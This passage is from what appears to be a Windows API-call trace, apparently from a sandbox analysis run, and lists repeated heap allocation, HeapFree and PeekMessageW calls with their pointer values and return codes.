wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.404] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0121.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0121.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.404] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.404] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.404] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0121.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0121.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.405] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.405] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.405] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.405] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0121.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0121.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.406] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.406] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.406] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.406] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.407] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.407] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.407] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.407] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.407] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.407] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0121.408] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.420] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.420] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.420] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.420] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0121.421] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c8a0 | out: hHeap=0x12c0000) returned 1 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.421] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be288 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.422] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.423] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.426] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1530b90 | out: hHeap=0x12c0000) returned 1 [0121.426] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.426] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x154cda0 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.427] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.427] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.427] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.427] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.428] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.428] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.428] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.428] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.428] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.428] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.429] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.429] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14588d8 | out: hHeap=0x12c0000) returned 1 [0121.429] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.429] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.429] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.429] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0121.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.430] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.430] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.430] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0121.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.432] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.432] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0121.433] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.433] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.433] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.433] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.433] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.433] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0121.433] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.433] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.471] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.471] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.471] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0121.471] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.471] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.471] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.471] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.472] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.472] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.472] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.472] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.472] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.472] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.472] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.473] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.473] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.473] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.473] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.473] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.473] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.474] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.474] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.474] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.474] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.474] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.474] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.474] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.474] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0121.474] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.474] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.474] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, 